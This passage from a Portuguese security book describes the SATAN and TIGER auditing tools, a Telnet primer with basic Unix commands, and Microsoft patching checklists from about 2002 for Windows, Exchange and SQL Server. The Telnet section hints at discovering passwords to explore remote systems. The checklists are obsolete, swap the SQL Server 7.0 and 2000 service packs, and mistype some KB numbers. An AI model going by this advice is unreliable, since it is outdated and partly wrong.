Terrorismo Tecnológico 352
Aprenda Para Sobreviver

nestes serviços. Estes furos geralmente são causados por erros de


configuração ou bugs conhecidos dos diversos daemons. Além
disto, ele pode não apenas analisar diversos hosts individualmente,
mas também procurar furos baseados em Trusted Hosts, e este sim
ter problemas de segurança [DAN96]. O SATAN pode também ser
utilizado para verificar a topologia de uma rede, serviços oferecidos,
tipos de hardware e software, etc.

19.8.2 TIGER
Muito parecido com o SATAN, o TIGER, é um conjunto de
Bourne Shell (bash) scripts, programas em C e arquivos de dados
que visam fazer uma auditoria de segurança num sistema Unix.

Sua maior diferença em relação ao SATAN está no fato de que a


ênfase do TIGER esta em erros de permissões de arquivos, e não
na área de serviços de rede, que é o caso do SATAN.

Basicamente, quando é executado, TIGER procura por um


arquivo de configuração (geralmente.tigerrc) que irá limitar ou
ampliar a quantidade de testes executados dependendo do desejo
do usuário. Ele então irá executar uma série de scripts e retornará
as falhas de segurança encontradas.

O TIGER sempre tenta descobrir formas que a conta root pode ser
comprometida.
Terrorismo Tecnológico 353
Aprenda Para Sobreviver

19.9 Telnet & Unix

TELNET (Protocolo de Terminal Virtual) é um protocolo Internet


para estabelecer a conexão entre computadores e através dessa
conexão remota pode-se executar qualquer comando ou até um
programa em outra máquina, isto funciona tudo remotamente como
se o teclado de seu computador estivesse ligado na CPU da outra
máquina.
A interface para trabalhar é primitiva como a do dos sendo que a
operação do computador remoto se dá da mesma forma, ou seja,
através de uma linha de comandos UNIX.
Este programinha (telnet) já esta instalado na sua máquina,
acontece que ele já vem instalado no Sistema Operacional.
O Telnet pode ser usado para a pesquisa de informações e
transferência de arquivos desde que o computador ao qual você
está conectado permitir que você faça essas funções.
Na verdade o Telnet foi desenvolvido para que operadores de
sistemas (Sysop's) pudessem fazer algum tipo de manutenção em
algum sistema, como em uma empresa ou servidor, assim que
aparece algum erro ou problema o administrador remotamente
através do telnet pode corrigir estes erros e colocar o Sistema para
funcionar.

Programas para Telnet:

Para fazer uma conexão via Telnet, é necessário um programa


específico. O windows 95 já vem com um, procure no diretório
c:\windows o programa telnet.exe.

Conectando-se via Telnet Os passos que apresentamos aqui são


para o programa que acompanha a partir do Windows 95, mas são
idênticos ou mudam mínimas coisas para os posteriores.
Terrorismo Tecnológico 354
Aprenda Para Sobreviver

Inicie o programa Telnet.exe. Clique no menu "Conecta" (connect),


selecione"Sistema Remoto" (remote system) e digite na caixa
"Nome do Host" (Host Name) o endereço ao qual você quer se
conectar.
Nas caixas "Porta" (port) e "Tipo do Terminal" (terminal type)
selecione "telnet" e "vt100", respectivamente (isso não é um padrão,
mas é usual; pode ser que em alguns lugares você tenha
que mudar essa configuração). Feito isto, clique no botão "Conectar"
(Connect). Isto iniciará a conexão com o computadorremoto.
Ao se completar a conexão, o sistema remoto pedirá uma senha.
A qual ou você deverá saber ou descobrir.
Agora isto abrirá as portas do computador remoto. Na tela surge
uma série de opções, precedidas de um número ou letra.
Para executar um desses comandos, digite esse número ou letra
e tecle enter agora é só explorar e ao terminar a conexão, volte ao
menu "Conecta" e selecione "Desconectar".

Endereços para conexão:

netfind.if.usp.br - Busca mundial de usuários na Internet.


Digite netfind ao estabelecer a conexão.

ned.ipac.caltech.edu - Banco de dados Extragalático da


NASA/IPAC.
Digite ned ao estabelecer a conexão..

spacelink.msfc.nasa.gov - Banco de dados da NASA.


Digite guest ao estabelecer a conexão.

stis.nsf.gov : Informações científicas e tecnológicas.


Digite public ao estabelecer a conexão.
Terrorismo Tecnológico 355
Aprenda Para Sobreviver

Comandos básicos de Unix

Os servidores não permitem acesso público via Telnet, porque


essa é a principal porta de entrada de qualquer invasor.
Para impedir não se encontram menus que facilitam a navegação
pelo site ou operações de qualquer tipo, o que leva a necessidade
de se conhecer os comandos para poder navegar.

Como os:

ls -l lista os arquivos de um diretório

ls -al lista todos os arquivos de um diretório, mesmo os Hidden

cp x y copia o arquivo do diretório x para o diretório y (o caminho de


diretório deve ser colocado por inteiro)

mv x y move o arquivo do diretório x para o diretório y (o caminho de


diretório deve ser colocado por inteiro)

rm x deleta o arquivo x

cd xxx muda o diretório ativo para xxx

cd .. muda o diretório ativo para o que está 'acima' do atual

mkdir xxx cria o diretório xxx dentro do diretório atual

rm xxx remove o diretório xxx


Terrorismo Tecnológico 356
Aprenda Para Sobreviver

Capítulo XX

Sistemas - Com este guia passo a passo, vamos melhorar os


principais sistemas que são instalados em servidores e desktops,
Terrorismo Tecnológico 357
Aprenda Para Sobreviver

Vamos melhorar nossos sistemas!

Siga as seguintes etapas conforme o sistema instalado em seus


servidores ou desktops.

20.1 Desktops com Windows XP

1. Familiarize-se com este guia sobre como obter segurança e


manter-se seguro e estas práticas recomendadas para
segurança da empresa
(http://www.microsoft.com/technet/security/bestprac/bpentsec.
asp)
2. Compreenda os novos recursos de segurança do Windows
XP Professional
(http://microsoft.com/technet/prodtechnol/winxppro/evaluate/x
psec.asp)
3. Mantenha seu sistema atualizado automaticamente com a
atualização automática do Windows ativada por padrão no
Windows XP ou, como alternativa, verifique com freqüência o
serviço do Windows Update
o Para administradores de sistema, o Catálogo do
Windows Update
(http://v4.windowsupdate.microsoft.com/en/default.asp)
permite selecionar as atualizações que precisam de
download e obter uma versão que pode ser distribuída
pela empresa.
Terrorismo Tecnológico 358
Aprenda Para Sobreviver

4. Consulte as seções Security


(http://microsoft.com/technet/prodtechnol/winxppro/reskit/prpt_
pt3_ptnz.asp) e Networking
(http://microsoft.com/technet/prodtechnol/winxppro/reskit/prpt_
pt4_rrqd.asp) do Windows XP Resource Kit para configurar
seu firewall e o compartilhamento
(http://www.microsoft.com/TechNet/prodtechnol/winxppro/prod
docs/Share_conn_overvw.asp) da conexão com a Internet.
5. Mantenha-se em dia com os hotfixes de segurança mais
recentes usando Security Bulletins Search
6. Atualize as ferramentas antivírus e os arquivos de assinatura
de vírus. Verifique regularmente os alertas de vírus
(http://www.microsoft.com/technet/security/virus/virus.asp).

20.2 Desktops com Windows 2000

1. Familiarize-se com este guia sobre como obter segurança e


manter-se seguro
(http://microsoft.com/security/articles/steps_default.asp) e
estas práticas recomendadas para segurança da empresa
(http://www.microsoft.com/technet/security/bestprac/bpentsec.
asp)
2. Verifique com freqüência o serviço Windows Update
(http://windowsupdate.microsoft.com/). Como alternativa para
Terrorismo Tecnológico 359
Aprenda Para Sobreviver

administradores de sistema, o Catálogo do Windows Update


(http://v4.windowsupdate.microsoft.com/en/default.asp)
permite selecionar as atualizações que precisam de download
e obter uma versão que pode ser distribuída pela empresa.
3. Instale o Windows 2000 Security Rollup Package 1
(http://www.microsoft.com/technet/security/news/w2ksrp1.asp)
4. Use o conjunto de ferramentas de configuração do sistema da
Microsoft
(http://www.microsoft.com/technet/prodtechnol/windows2000s
erv/deploy/confeat/securcon.asp), para configurar a
segurança do sistema e realizar análises periódicas.
5. Mantenha-se em dia com os hotfixes de segurança mais
recentes usando Security Bulletins Search
(http://www.microsoft.com/technet/security/current.asp?produc
tid=5&servicepackid=0)
6. Consulte a seção Security do Windows 2000 Resource Kit
para configurar a rede e a segurança na Internet.
7. Consulte Security Newsgroups para aprender como outros
usuários resolvem seus requisitos de segurança.
8. Atualize as ferramentas antivírus e os arquivos de assinatura
de vírus. Verifique regularmente os alertas de vírus
(http://www.microsoft.com/technet/security/virus/virus.asp).

20.3 Desktops com Windows NT 4.0


Terrorismo Tecnológico 360
Aprenda Para Sobreviver

1. Familiarize-se com este guia sobre como obter segurança e


manter-se seguro
(http://microsoft.com/security/articles/steps_default.asp) e
estas práticas recomendadas para segurança da empresa
(http://www.microsoft.com/technet/treeview/default.asp?url=/te
chnet/security/bestprac/bpentsec.asp)
2. Verifique com freqüência o serviço Windows Update
(http://windowsupdate.microsoft.com/). Como alternativa para
administradores de sistema, o Catálogo do Windows Update
(http://v4.windowsupdate.microsoft.com/en/default.asp)
permite selecionar as atualizações que precisam de download
e obter uma versão que pode ser distribuída pela empresa.
3. Use o conjunto de ferramentas de configuração do sistema da
Microsoft
(http://www.microsoft.com/technet/prodtechnol/windows2000s
erv/deploy/confeat/securcon.asp) para configurar a segurança
do sistema e realizar análises periódicas.
4. Mantenha-se em dia com os hotfixes de segurança mais
recentes usando Security Bulletins Search
(http://www.microsoft.com/technet/security/current.asp?produc
tid=54)
5. Consulte a seção Security do Windows NT Resource Kit para
configurar a rede e a segurança na Internet.
Terrorismo Tecnológico 361
Aprenda Para Sobreviver

6. Atualize as ferramentas antivírus e os arquivos de assinatura


de vírus. Verifique regularmente os alertas de vírus.
(http://www.microsoft.com/technet/security/virus/virus.asp)

20.4 Desktops com Windows 9X, SE e ME

1. Familiarize-se com este guia sobre como obter segurança e


manter-se seguro
(http://microsoft.com/security/articles/steps_default.asp) e
estas práticas recomendadas para segurança da empresa
(http://www.microsoft.com/technet/security/bestprac/bpentsec.
asp)
2. Verifique com freqüência o serviço Windows Update.
(http://windowsupdate.microsoft.com/) Como alternativa para
administradores de sistema, o Catálogo do Windows Update
(http://v4.windowsupdate.microsoft.com/en/default.asp)
permite selecionar as atualizações que precisam de download
e obter uma versão que pode ser distribuída pela empresa.
3. Atualize as ferramentas antivírus e os arquivos de assinatura
de vírus. Verifique regularmente os alertas de vírus
(http://www.microsoft.com/technet/security/virus/virus.asp)

20.5 Manutenção de segurança contínua


Terrorismo Tecnológico 362
Aprenda Para Sobreviver

Sem a manutenção contínua, o seu sistema pode se tornar


vulnerável a novas formas de ataques. Siga regularmente estas
etapas recomendadas:

• Use a ferramenta Hfnetchk


(http://www.microsoft.com/technet/security/tools/tools/hfnetchk
.asp) para avaliar as correções de segurança que foram
aplicadas ao sistema operacional Windows 2000, assim como
as correções de segurança para o Internet Information
Services 5.0, o SQL Server 7.0, o SQL Server 2000 (incluindo
o Microsoft Data Engine [MSDE]) e o Internet Explorer 5.01 ou
superior. É recomendável executar as etapas necessárias
para assegurar que todos os patches de segurança críticos
sejam instalados.
• Inscreva-se no Microsoft Security Notification Service.
(http://www.microsoft.com/technet/security/bulletin/notify.asp)
Esse é um serviço gratuito de notificação por email que a
Microsoft utiliza para enviar informações aos assinantes sobre
a segurança dos produtos da Microsoft.
• É importante aplicar as novas correções de segurança
disponibilizadas. A Microsoft criou a ferramenta Qchain
(http://www.microsoft.com/downloads/release.asp?ReleaseID
=29821) para reunir os hotfixes, de forma que somente uma
reinicialização seja necessária durante a instalação de várias
correções.
Terrorismo Tecnológico 363
Aprenda Para Sobreviver

20.6 Desktops com Office

1. Mantenha o sistema atualizado automaticamente por meio do


site Office Update em
http://office.microsoft.com/brasil/productupdates/default.aspx.
o Para administradores de sistemas, o Centro de
download
(http://office.microsoft.com/brasil/Downloads/default.asp
x) do Office permite selecionar as atualizações que
precisam de download e obter uma versão que pode
ser distribuída pela empresa.
2. Consulte a área Office Security na Microsoft TechNet
(http://microsoft.com/technet/security/default.asp) para
acessar uma lista abrangente de boletins de hotfixes e
segurança para sua versão do Microsoft Office.
3. Mantenha-se em dia com os hotfixes de segurança mais
recentes usando Security Bulletins Search
(http://www.microsoft.com/technet/security/current.asp)
4. Atualize as ferramentas antivírus e os arquivos de assinatura
de vírus. Verifique regularmente os alertas de vírus.
(http://www.microsoft.com/technet/security/virus/virus.asp)
Terrorismo Tecnológico 364
Aprenda Para Sobreviver

20.7 Servidores Exchange 2000

1. Antes de começar: atualize os servidores que estiverem


executando o Exchange 2000, o Active Directory Connector e
o Exchange Conferencing e todos os controladores de
domínio e os servidores de catálogo global para o Windows
2000 Service Pack 2.

1.1 Instale o Windows 2000 Service Pack


(http://www.microsoft.com/windows2000/downloads/servicepa
cks/sp2/default.asp) mais recente. Siga o Microsoft Windows
2000 Service Pack
(http://www.microsoft.com/technet/prodtechnol/windows2000s
erv/support/spdeploy.asp) Installation and Deployment Guide
(site em inglês) para obter informações detalhadas sobre
como instalar o Service Pack.

Instale os hotfixes pós-SP2 críticos para o Windows 2000.

1.2 Instale o Security Rollup Package (SRP1).

Q311401
(http://support.microsoft.com/default.aspx?scid=kb;en-
us;Q311401), "Windows 2000 Security Rollup Package 1
Terrorismo Tecnológico 365
Aprenda Para Sobreviver

(SRP1)", lançado em 30 de janeiro de 2002. O Windows 2000


SRP1 ultrapassa o Windows 2000 SP2 e deve ser aplicado.

1.3 Instale o SNMP Security Update.

Q314147
(http://support.microsoft.com/default.aspx?scid=kb;en-
us;Q314147) , "MS02-006: An Unchecked Buffer in the SNMP
Service May Allow Code to Run (Q314147)" (site em inglês)
lançado em 15 de fevereiro de 2002

1.4 Instale o Patch de segurança: SMTP Rollup.

Q313450
(http://support.microsoft.com/default.aspx?scid=kb;en-
us;Q313450) , "Windows 2000 Security Patch: SMTP Rollup"
(site em inglês), lançado em 27 de fevereiro de 2002

1.5 Execute o IIS Lockdown Wizard.

A Microsoft lançou uma versão atualizada do IIS Lockdown


Wizard versão 2.1
(http://www.microsoft.com/technet/treeview/default.asp?url=/te
chnet/security/Default.asp) (site em inglês), que fornece
modelos para os principais produtos Microsoft dependentes
do IIS. O IIS Lockdown Wizard desativa recursos
desnecessários, reduzindo assim a superfície de ataque
Terrorismo Tecnológico 366
Aprenda Para Sobreviver

disponível a invasores. Para fornecer uma defesa satisfatória


ou várias camadas de proteção contra invasores, o URLscan,
com modelos personalizados para cada função de servidor
com suporte, foi integrado ao IIS Lockdown Wizard.

Para fazer o download da ferramenta,


(http://www.microsoft.com/Downloads/Release.asp?ReleaseI
D=33961) (site em inglês)

1.6 Faça o download e execute o Microsoft Baseline


Security Analyzer (MBSA)
(http://support.microsoft.com/view/tn.asp?kb=320454) para
obter um relatório sobre os problemas de configuração de
segurança mais comuns.

Para obter mais informações sobre a segurança do Windows


2000,
http://www.microsoft.com/technet/security/tools/chklst/wsrvsec
.asp (site em inglês)

2. Instale o Exchange 2000 Service Pack


(http://www.microsoft.com/exchange/downloads/2000/sp2/def
ault.asp) mais recente

Siga este guia:


Terrorismo Tecnológico 367
Aprenda Para Sobreviver

a. Se for uma instalação sem cluster, siga o Exchange


2000 Service Pack 2 Deployment Guide
http://www.microsoft.com/exchange/techinfo/deploymen
t/2000/SP2Deployment.asp).
b. Se for uma instalação em cluster, siga o guia
Deploying Microsoft Exchange 2000 Server Service
Pack 2 Clusters
(http://www.microsoft.com/technet/treeview/default.asp?
url=/technet/prodtechnol/exchange/support/sp2ClustGd/
1-Intro.asp ) (site em inglês).

3. Instale os hotfixes pós-SP2 do Exchange 2000 relevantes


(sites em inglês):

3.1 Q316056
(http://support.microsoft.com/view/tn.asp?kb=316056) XGEN:
Exchange 2000 Server Post-SP2 Admin Fixes Available

3.2 Q315911
(http://support.microsoft.com/view/tn.asp?kb=3159110 XGEN:
Exchange 2000 Server Post-SP2 MTA Fixes Available

3.3 Q316463
(http://support.microsoft.com/view/tn.asp?kb=316463) XGEN:
Exchange 2000 Server Post-Service Pack 2 Directory Fixes A
Terrorismo Tecnológico 368
Aprenda Para Sobreviver

3.4 Q316465
(http://support.microsoft.com/view/tn.asp?kb=316465) XGEN:
Exchange 2000 Server Post-Service Pack 2 CDO Fixes

3.5 Q316664
(http://support.microsoft.com/view/tn.asp?kb=316664) XGEN:
Exchange 2000 Server Post-Service Pack 2 Protocols Fixes

3.6 Q317323
(http://support.microsoft.com/view/tn.asp?kb=317323) XGEN:
Exchange 2000 Server Post-Service Pack 2 Transport Fixes

Para obter uma lista dos artigos sobre hotfix pós-SP2 do


Microsoft Exchange 2000 Server, vá em
http://support.microsoft.com/view/tn.asp?kb=301378 site em
inglês)

Exchange 2000 Conferencing Server

Para obter informações adicionais sobre como adquirir os


pacotes de serviços do Exchange 2000 Conferencing Server,
clique no número do artigo a seguir para exibi-lo no Microsoft
Knowledge Base:

Q302473
(http://support.microsoft.com/view/tn.asp?kb=302473) XGEN:
Terrorismo Tecnológico 369
Aprenda Para Sobreviver

How to Obtain the Latest Exchange 2000 Conferencing Server


Service Pack

4. Fique atualizado com os hotfixes de segurança mais recentes


usando Security Bulletins Search
5. Atualize as ferramentas antivírus e os arquivos de assinatura
de vírus. Verifique os alertas de vírus
(http://www.microsoft.com/technet/security/virus/virus.asp)
(site em inglês) regularmente.

Manutenção de segurança contínua

Sem a manutenção contínua, o seu sistema pode se tornar


vulnerável a novas formas de ataques. Siga regularmente estas
etapas recomendadas:

• Use a ferramenta Hfnetchk


(http://www.microsoft.com/technet/security/tools/tools/hfnetchk
.asp) para avaliar as correções de segurança que foram
aplicadas ao sistema operacional Windows 2000, assim como
as correções de segurança para o Internet Information
Services 5.0, o SQL Server 7.0, o SQL Server 2000 (incluindo
o Microsoft Data Engine [MSDE]) e o Internet Explorer 5.01 ou
superior. É recomendável executar as etapas necessárias
para assegurar que todos os patches de segurança críticos
sejam instalados.
Terrorismo Tecnológico 370
Aprenda Para Sobreviver

• Inscreva-se no Microsoft Security Notification Service


(http://www.microsoft.com/technet/security/bulletin/notify.asp)
(site em inglês). Esse é um serviço gratuito de notificação por
email que a Microsoft utiliza para enviar informações aos
assinantes sobre a segurança dos produtos da Microsoft.
• Use o site Windows Update
(http://windowsupdate.microsoft.com/) (site em inglês) para
verificar as atualizações recomendáveis e críticas mais
recentes.
• É importante aplicar as novas correções de segurança
disponibilizadas. A Microsoft criou a ferramenta Qchain
(http://www.microsoft.com/downloads/release.asp?ReleaseID
=29821) (site em inglês) para reunir os hotfixes, de forma que
somente uma reinicialização seja necessária durante a
instalação de várias correções.

Para obter mais informações

Estas são informações adicionais sobre como manter seus


servidores Exchange seguros:

Configuration and Security Update Recommendations for


Exchange 2000
(http://www.microsoft.com/Exchange/techinfo/deployment/2000/Best
Config.asp)
Terrorismo Tecnológico 371
Aprenda Para Sobreviver

Home page do Microsoft Baseline Security Analyzer


(http://www.microsoft.com/technet/security/tools/tools/mbsahome.as
p)

Como parte do Strategic Technology Protection Program da


Microsoft e em resposta à necessidade direta do consumidor de
obter um método fácil de identificação de problemas de segurança
comuns, a Microsoft desenvolveu o Microsoft Baseline Security
Analyzer (MBSA).

Home page do Microsoft Baseline Security Analyzer


(http://www.microsoft.com/technet/security/tools/tools/mbsawp.asp)

Perguntas e respostas do Microsoft Baseline Security Analyzer


(MBSA) Versão 1.0
(http://www.microsoft.com/technet/security/tools/tools/mbsaqa.asp)

Planejamento e instalação do Exchange 2000 Server Chapter 13 –


System Security
(http://www.microsoft.com/technet/prodtechnol/exchange/proddocs/e
x2kplan/c13secur.asp)

Exchange 2000 Server Resource Kit Chapter 24 - Security


Sensitive Environments
(http://www.microsoft.com/technet/prodtechnol/exchange/reskit/ex00
res/deploygd/part5/c24secur.asp)
Terrorismo Tecnológico 372
Aprenda Para Sobreviver

Exchange 2000 Server Resource Kit Chapter 30 – Security


(http://www.microsoft.com/technet/prodtechnol/exchange/reskit/ex00
res/resguide/c30scrty.asp)

Exchange 2000 Server Upgrade Series - Planning Guide Chapter 6


- Constructing Security and Administrative Models
(http://www.microsoft.com/technet/prodtechnol/exchange/proddocs/e
x2kupgr/planus/p_06_tt1.asp)

Exchange 2000 Server Upgrade Series - Planning Guide Chapter 9


- Ensuring Messaging Security
(http://www.microsoft.com/technet/prodtechnol/exchange/proddocs/e
x2kupgr/planus/p_09_tt1.asp)

Exchange 2000 Server Upgrade Series - Planning Guide Glossary -


Exchange 2000, Windows 2000 And Security Glossary
(http://www.microsoft.com/technet/prodtechnol/exchange/proddocs/e
x2kupgr/planus/glossary.asp)

Leveraging Security Features in Windows 2000 for Exchange


(http://www.microsoft.com/technet/prodtechnol/exchange/maintain/fe
atusability/leversec.asp)

Web Storage System Security Roles


(http://www.microsoft.com/technet/prodtechnol/exchange/maintain/fe
atusability/secroles.asp)
Terrorismo Tecnológico 373
Aprenda Para Sobreviver

Exchange Server 5.5 Security


(http://www.microsoft.com/technet/security/prodtech/exc10.asp)

Exchange Server 5.5 Resource Guide Part 11 – Security


(http://www.microsoft.com/technet/prodtechnol/exchange/reskit/ex55
res/exc10.asp)

Exchange Server 5.5, 24 seven , publicado pela Sybex Inc.


Exchange Server Advanced Security
(http://www.microsoft.com/technet/prodtechnol/exchange/maintain/o
ptimize/advan.asp)

Noções básicas desde 1999: Enhancing Microsoft Exchange


Server's Security
(http://www.microsoft.com/technet/prodtechnol/exchange/support/ex
chsec.asp)

Artigos relevantes da Knowledge Base

XCCC: IIS Lockdown and URLscan Configurations in Exchange


Environment. (Q309508)
(http://support.microsoft.com/view/tn.asp?kb=309508)

As ferramentas de segurança de serviços de informações da


Internet (IIS), IISlockD e URLscan, devem ser configuradas de forma
apropriada para o Exchange. Este artigo descreve a configuração
Terrorismo Tecnológico 374
Aprenda Para Sobreviver

necessária para essas ferramentas nos ambientes do Exchange


2000 Server e do Exchange Server 5.5.

XADM: Security of Exchange 2000 for Exchange Domain Servers


Group (Q313807)
(http://support.microsoft.com/view/tn.asp?kb=313807)

Este artigo descreve como obter e usar um script que restringe o


acesso aos grupos Exchange Domain Servers em uma floresta.

Uma instalação padrão do Exchange cria um grupo Exchange


Domain Servers para cada domínio da floresta. Esse grupo contém
as contas de computador para cada servidor Exchange de um
determinado domínio. Os grupos têm acesso a todo o
armazenamento de caixa de correio e pasta pública do Exchange na
floresta. Talvez, os clientes desejem conceder acesso a
armazenamentos de caixa de correio somente ao servidor local que
hospeda os armazenamentos.

PROCEDIMENTOS: Use SMTP Connectors to Connect Routing


Groups (Q319407)
(http://support.microsoft.com/view/tn.asp?kb=319407)

Você pode usar um conector SMTP para conectar o computador


com Exchange 2000 a computadores SMTP não-Exchange Server,
como computadores na Internet. Você também pode usar um
conector SMTP para conectar grupos de roteamento do Exchange
Terrorismo Tecnológico 375
Aprenda Para Sobreviver

Server em cenários onde conectores SMTP não são adequados, por


exemplo, caso a conexão entre os grupos de roteamento não for
permanente ou caso a conexão precise rotear para Internet. A
configuração de conectores SMTP é um pouco mais complexa do
que a configuração de conectores de grupo de roteamento e não
transmitem automaticamente informações de estado de conexão do
Exchange Server.

PROCEDIMENTOS: Secure SMTP Client Message Delivery in


Exchange 2000 (Q319267)
(http://support.microsoft.com/view/tn.asp?kb=3192670)

Este artigo descreve passo a passo como criptografar a entrega de


email de protocolo de transferência de correio simples (SMTP) para
conexões de entrada de cliente (POP3 e IMAP4) em computadores
com Exchange 2000, de modo que os usuários possam autenticar e
receber material potencialmente sensível sem que o nome de
usuário, a senha ou o conteúdo da mensagem corram o risco de
serem interceptados.

PROCEDIMENTOS: Secure IMAP Client Access in Exchange 2000


(Q319278) (http://support.microsoft.com/view/tn.asp?kb=319278)

Este artigo descreve passo a passo como configurar a segurança


para conexões de entrada de protocolo de acesso a mensagens da
Internet versão 4 (IMAP4) em computadores com Exchange 2000,
de modo que os usuários possam autenticar e receber material
Terrorismo Tecnológico 376
Aprenda Para Sobreviver

potencialmente sensível sem que o nome de usuário, a senha ou o


conteúdo da mensagem corram o risco de serem interceptados.

PROCEDIMENTOS: Secure Post Office Protocol Client Access in


Exchange (Q319273)
(http://support.microsoft.com/view/tn.asp?kb=319273)

20.8 Mantendo o SQL Seguro

Antes de começar: você deve atualizar os servidores que


estiverem executando o SQL Server para o Windows 2000 Service
Pack 2.

Instale o Windows 2000 Service Pack mais recente


(http://www.microsoft.com/windows2000/downloads/servicepa
cks/sp2/default.asp ) (site em inglês). Siga o Microsoft
Windows 2000 Service Pack Installation and Deployment
Guide
(http://www.microsoft.com/technet/prodtechnol/windows2000s
erv/support/spdeploy.asp) (site em inglês) para obter
informações detalhadas sobre como instalar o Service Pack.

Você também deve instalar os hotfixes pós-SP2 críticos para o


Windows 2000.

1. Instale o Security Rollup Package.


Terrorismo Tecnológico 377
Aprenda Para Sobreviver

Q311401
(http://support.microsoft.com/default.aspx?scid=kb;en-
us;Q311401) "Windows 2000 Security Rollup Package 1
(SRP1)" (site em inglês), lançado em 30 de janeiro de 2002

2. Instale o SNMP Security Update.

Q314147
(http://support.microsoft.com/default.aspx?scid=kb;en-
us;Q314147) , "MS02-006: An Unchecked Buffer in the SNMP
Service May Allow Code to Run (Q314147)" (site em inglês)
lançado em 15 de fevereiro de 2002

3. Execute o IIS Lockdown Wizard.

A Microsoft lançou uma versão atualizada do IIS Lockdown


Wizard versão 2.1
(http://www.microsoft.com/technet/treeview/default.asp?url=/te
chnet/security/Default.asp) (site em inglês), que fornece
modelos para os principais produtos Microsoft dependentes
do IIS. O IIS Lockdown Wizard desativa recursos
desnecessários, reduzindo assim a superfície de ataque
disponível a invasores. Para fornecer uma defesa satisfatória
ou várias camadas de proteção contra invasores, o URLscan,
com modelos personalizados para cada função de servidor
com suporte, foi integrado ao IIS Lockdown Wizard.
Terrorismo Tecnológico 378
Aprenda Para Sobreviver

Para fazer o download da ferramenta, vá para


http://www.microsoft.com/Downloads/Release.asp?ReleaseID
=33961 (site em inglês)

4. Faça o download e execute o Microsoft Baseline Security


Analyzer (MBSA)
(http://support.microsoft.com/view/tn.asp?kb=320454) (site em
inglês) para obter um relatório sobre os problemas de
configuração de segurança comuns.

Para obter mais informações sobre a segurança do Windows 2000,


vá para
(http://www.microsoft.com/technet/security/tools/chklst/wsrvsec.asp)
(site em inglês)

20.9 Servidores SQL Server 2000

Instale o SQL Server 7.0 Service Pack


(http://www.microsoft.com/sql/downloads/2000/sp2.asp) (site em
inglês) mais recente

Se for uma instalação sem cluster, siga estas etapas:

1. Faça backup dos bancos de dados do SQL Server


2. Faça backup dos bancos de dados do Analysis Services
3. Certifique-se de que os bancos de dados do sistema têm
espaço livre suficiente
Terrorismo Tecnológico 379
Aprenda Para Sobreviver

4. Pare serviços e aplicativos antes de executar a instalação do


SP2
5. Instale o Database Components SP2
6. Instale o Analysis Services SP2
7. Instale o Desktop Engine SP2
8. Reinicie os serviços
9. Reinicie os aplicativos

As etapas descritas acima encontram-se no Leiame do SQL Server


2000 Service Pack 2
(http://support.microsoft.com/support/servicepacks/SQL/2000/SP2R
eadMe.asp) (site em inglês)

Se for uma instalação em cluster com failover, siga as etapas na


seção 3.10 "Installing on a Failover Cluster" do Leiame do SQL
Server 2000 Service Pack 2
(http://support.microsoft.com/default.aspx?scid=http://support.micros
oft.com/support/servicepacks/SQL/2000/SP2ReadMe.asp#_3.10_ins
talling_on_a_failover_clusterhttp://support.microsoft.com/default.asp
x?scid=http://support.microsoft.com/suppo) (site em inglês)

Observação O SQL Server 2000 SP2 contém uma correção


adicional para English Query que você precisará aplicar
separadamente. Para obter mais informações sobre essa correção,
consulte "FIX: Potential English Query Security Issue" Q297105
Terrorismo Tecnológico 380
Aprenda Para Sobreviver

(http://support.microsoft.com/view/tn.asp?kb=297105) (site em
inglês)

Observação Os usuários do SQL Server 2000 Windows CE


Edition que atualizarem os servidores de editor e banco de dados
do SQL Server 2000 para a versão Service Pack 2 (SP2) também
deverão atualizar os componentes de replicação dos servidores
do Internet Information Services (IIS)
(http://www.microsoft.com/sql/downloads/CE/sp2.asp)

Instale os hotfixes pós-SP2 do SQL Server 2000 que sejam


relevantes

Faça o download e instale o SQL Server 2000 Security Update for


Service Pack 2
(http://support.microsoft.com/view/tn.asp?kb=316333) (site em
inglês)

Observe que a Microsoft distribui correções de segurança do SQL


Server 2000 por um arquivo do qual você pode fazer download.
Como as correções de segurança são cumulativas, cada nova
versão contém todas as correções de segurança incluídas na versão
anterior de correções de segurança do SQL Server 2000.

Para obter uma lista dos artigos sobre hotfixes pós-SP2 do Microsoft
SQL Server 2000, vá para:
(http://support.microsoft.com/default.aspx?scid=kb;EN-US;q290211)
(site em inglês)
Terrorismo Tecnológico 381
Aprenda Para Sobreviver

20.10 Servidores SQL Server 7.0

Instale o SQL Server 2000 Service Pack


(http://www.microsoft.com/sql/downloads/sp4.asp) mais recente

Para obter mais informações sobre SQL Server 7.0 Service Packs,
consulte: Q301511
(http://support.microsoft.com/view/tn.asp?kb=301511) INF: How to
Obtain the Latest SQL Server 7.0 Service Pack (site em inglês)

Siga as etapas descritas no capítulo 3 de INF: Readme.txt Files for


SQL Server 7.0 Service Packs (Q321817)
(http://support.microsoft.com/view/tn.asp?kb=321817) (site em
inglês)

Observação O SQL Server 7.0 SP4 não inclui atualizações para os


componentes dos serviços de processamento analítico on-line
(OLAP) do SQL Server 7.0. Para obter as atualizações mais
recentes desses componentes, faça o download da parte OLAP do
SQL Server 7.0 Service Pack 3
(http://www.microsoft.com/sql/downloads/sp3.asp)

Observe que SQL Server Security Patch


(http://support.microsoft.com/default.aspx?scid=http://support.micros
oft.com/support/sql/xp_security.asp) (site em inglês) está incluído no
SQL Server 7.0 Service Pack 4
Terrorismo Tecnológico 382
Aprenda Para Sobreviver

Mantenha-se atualizado a respeito dos hotfixes de segurança mais


recentes do SQL Server usando o HotFix & Security Bulletin
Service
(http://www.microsoft.com/technet/treeview/default.asp?url=/technet/
security/current.asp?productid=30&servicepackid=0) (site em inglês)

SQL Server 2000

Abril de 2002

MS02-020: SQL Extended Procedure Functions Contain


Unchecked Buffers (Q319507)
(http://www.microsoft.com/technet/treeview/default.asp?url=/technet/
security/bulletin/MS02-020.asp) (site em inglês)

Este problema foi corrigido primeiro no Microsoft SQL Server 2000


Service Pack 2.

Fevereiro de 2002

MS02-007: SQL Server Remote Data Source Function Contain


Unchecked Buffers
(http://www.microsoft.com/technet/security/bulletin/MS02-
007.asp)(site em inglês)

O patch para essa questão está disponível no SQL Server 2000


Security Update for Service Pack 2
Terrorismo Tecnológico 383
Aprenda Para Sobreviver

Dezembro de 2001

MS01-060: SQL Server Text Formatting Functions Contain


Unchecked Buffers
(http://www.microsoft.com/technet/security/bulletin/MS01-060.asp)
(site em inglês)

Este problema foi corrigido primeiro no SQL Server 2000 Service


Pack 2.

Julho de 2001

MS01-041: Malformed RPC Request Can Cause Service Failure


(http://www.microsoft.com/technet/security/bulletin/MS01-041.asp)
(site em inglês)

Este problema foi corrigido primeiro no SQL Server 2000 Service


